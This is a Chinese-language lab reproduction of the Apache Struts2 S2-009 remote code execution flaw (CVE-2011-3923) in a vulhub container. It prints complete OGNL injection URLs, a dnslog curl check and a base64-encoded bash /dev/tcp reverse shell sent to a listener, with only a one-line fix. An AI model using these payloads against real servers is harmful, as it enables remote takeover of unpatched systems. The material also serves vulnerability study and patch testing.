2023年1月7日14:45:20评论41 views字数 2193阅读7分18秒阅读模式

1 漏洞信息

漏洞名称	远程代码执行漏洞
漏洞编号	CVE-2011-3923
危害等级	高危
漏洞类型	中间件漏洞
漏洞厂商	Apache
漏洞组件	Struts2
受影响版本	2.0.0 <= Struts2 <= 2.3.1.1
漏洞概述	OGNL还提供广泛的表达评估功能。该漏洞使恶意用户可以绕过内置在ParametersInterceptor中的所有保护（正则表达式模式，拒绝方法调用），从而能够在任何公开的字符串变量中注入恶意表达式以进行进一步评估。

2 环境搭建

2.1 环境概述

Linux操作系统

2.2 搭建过程

拉取镜像

cd vulhub/struts2/s2-009docker-compose up -d

访问http://192.168.146.158:8009

【漏洞复现】S2-009 远程代码执行漏洞(CVE-2011-3923)

3 漏洞复现

构造一个恶意的payload并发送。

http://192.168.146.158:8009/ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27curl+5quvn8.dnslog.cn%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true=true

payload原型：http://192.168.146.158:8009/ajax/example5?age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('curl 5quvn8.dnslog.cn'))(meh)&z[(name)('meh')]=true=true

发现dns有记录，说明存在该漏洞。

【漏洞复现】S2-009 远程代码执行漏洞(CVE-2011-3923)

既然发现漏洞了，那我们可以开始反弹shell

bash -i >& /dev/tcp/192.168.146.158/9999 0>&1

base加密bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}

访问漏洞url并且添加恶意payload进行抓包。

http://192.168.146.158:8009/ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true=true

payload原型：http://192.168.146.158:8009/ajax/example5?age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}'))(meh)&z[(name)('meh')]=true=true

攻击机进行监听，然后发现成功反弹了shell。

【漏洞复现】S2-009 远程代码执行漏洞(CVE-2011-3923)

4 修复建议

1、推荐的解决方案：升级至比受漏洞影响的更高版本。

- End -

原文始发于微信公众号（NS Demon团队）：【漏洞复现】S2-009 远程代码执行漏洞(CVE-2011-3923)

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】S2-009 远程代码执行漏洞(CVE-2011-3923)

1 漏洞信息

2 环境搭建

2.1 环境概述

2.2 搭建过程

3 漏洞复现

4 修复建议

【论文速读】|理解基于大语言模型的模糊测试驱动程序生成

Web攻击应急响应 | 干货

基于ChatGPT大语言模型，通过聊天机器人自动创建vulhub的漏洞靶机环境

科恩BinaryAI@ICSE2024论文解读｜基于大模型的二进制软件成分分析

网络认证：一文带你了解Juniper认证体系！

eBPF及HTTPS明文抓包的分析

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

shiro反序列化漏洞绕waf防护的方法总结 | 干货

关于我挖洞的经历

LLM 安全 | 大语言模型应用安全入门

发表评论

在线咨询

微信